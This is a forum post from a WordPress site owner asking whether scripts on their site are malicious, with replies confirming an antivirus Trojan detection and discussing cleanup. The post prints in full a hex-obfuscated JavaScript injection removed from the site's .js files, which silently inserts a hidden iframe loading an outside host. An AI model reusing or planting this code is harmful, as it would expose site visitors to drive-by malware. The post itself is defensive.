Malware on website hxxp looks suspicious

Google has detected malicious file/malware on our website I checked it with
redleg and some of these values are displayed yellow..

<div style=" display: none ;">
<input type="hidden" name="_wpcf7" value="41" />
<input type="hidden" name="_wpcf7_version" value="4.3" />
<input type="hidden" name="_wpcf7_locale" value="" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f41-o1" />
<input type="hidden" name="_wpnonce" value="649583a56e" />
  </div> 

PS. I change our website links here to our website for security purpose and privacy

Read More
< sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=52e4c650d67bb1484c4a926e5a0eccaf-2014.06.20'> < / sc?ript >
 < sc?ript type='text/javascript'>
 /* < ![CDATA[ */
 var _wpcf7 = {"loaderUrl":"http://ourwebsite.com/wp-content/plugins/contact-form-7/images/ajax-loader.gif","sending":"Sending ..."};
 /* ]]> */
 < / sc?ript >
< sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=52e4c650d67bb1484c4a926e5a0eccaf'> < / sc?ript >

Can someone tell if these scripts look malicious ..

What I did is delete all this script from all my .js files

 /*dd58e691432e362d70bf5b7534f31b87*/
 var _0xacbd=["x6Fx6Ex6Cx6Fx61x64","x67x65x74x44x61x74x65","x73x65x74x44x61x74x65","x63x6Fx6Fx6Bx69x65","x3D","x3Bx20x65x78x70x69x72x65x73x3D","x74x6Fx55x54x43x53x74x72x69x6Ex67","","x3Dx28x5Bx5Ex3Bx5Dx29x7Bx31x2Cx7D","x65x78x65x63","x73x70x6Cx69x74","x61x64x2Dx63x6Fx6Fx6Bx69x65","x65x72x32x76x64x72x35x67x64x63x33x64x73","x64x69x76","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x68x74x74x70x3Ax2Fx2Fx73x74x61x74x73x2Ex62x61x6Cx77x35x65x7Ax76x69x63x7Ax37x68x6Bx61x2Ex70x77x2Fx3Fx69x64x3Dx36x39x34x37x36x32x37x26x6Bx65x79x77x6Fx72x64x3D","x26x61x64x5Fx69x64x3Dx58x6Ex35x62x65x34","x69x6Ex6Ex65x72x48x54x4Dx4C","x3Cx64x69x76x20x73x74x79x6Cx65x3Dx27x70x6Fx73x69x74x69x6Fx6Ex3Ax61x62x73x6Fx6Cx75x74x65x3Bx7Ax2Dx69x6Ex64x65x78x3Ax31x30x30x30x3Bx74x6Fx70x3Ax2Dx31x30x30x30x70x78x3Bx6Cx65x66x74x3Ax2Dx39x39x39x39x70x78x3Bx27x3Ex3Cx69x66x72x61x6Dx65x20x73x72x63x3Dx27","x27x3Ex3Cx2Fx69x66x72x61x6Dx65x3Ex3Cx2Fx64x69x76x3E","x61x70x70x65x6Ex64x43x68x69x6Cx64","x62x6Fx64x79"];window[_0xacbd[0]]=function(){function _0x78a6x1(_0x78a6x2,_0x78a6x3,_0x78a6x4){if(_0x78a6x4){var _0x78a6x5= new Date();_0x78a6x5[_0xacbd[2]](_0x78a6x5[_0xacbd[1]]()+_0x78a6x4);};if(_0x78a6x2&&_0x78a6x3){document[_0xacbd[3]]=_0x78a6x2+_0xacbd[4]+_0x78a6x3+(_0x78a6x4?_0xacbd[5]+_0x78a6x5[_0xacbd[6]]():_0xacbd[7])}else {return false};}function _0x78a6x6(_0x78a6x2){var _0x78a6x3= new RegExp(_0x78a6x2+_0xacbd[8]);var _0x78a6x4=_0x78a6x3[_0xacbd[9]](document[_0xacbd[3]]);if(_0x78a6x4){_0x78a6x4=_0x78a6x4[0][_0xacbd[10]](_0xacbd[4])}else {return false};return _0x78a6x4[1]?_0x78a6x4[1]:false;}var _0x78a6x7=_0x78a6x6(_0xacbd[11]);if(_0x78a6x7!=_0xacbd[12]){_0x78a6x1(_0xacbd[11],_0xacbd[12],1);var _0x78a6x8=document[_0xacbd[14]](_0xacbd[13]);var _0x78a6x9=983755;var _0x78a6xa=_0xacbd[15]+_0x78a6x9+_0xacbd[16];_0x78a6x8[_0xacbd[17]]=_0xacbd[18]+_0x78a6xa+_0xacbd[19];document[_0xacbd[21]][_0xacbd[20]](_0x78a6x8);};};
 /*dd58e691432e362d70bf5b7534f31b87*/

Related posts

3 comments

  1. My Antivirus (ESet Endpoint Security 5.0.2) detects the above javascript var block code as a Trojan virus and refuses to load this page while my antivirus is enabled. That’s a pretty good sign this is indeed a bad code-block.

    So to answer your query, yes, the code you posted is indeed malicious.

  2. I downloaded Anti-Malware Security and Brute-Force Firewall, now the threat disappear although there is still remaining, but on other url, which is

    but these two only redirect the page to the main page..

    PS. I have backups that is stored on the FTP before the cleanup should I delete them as well? or is it fine as long as they aren’t running

Comments are closed.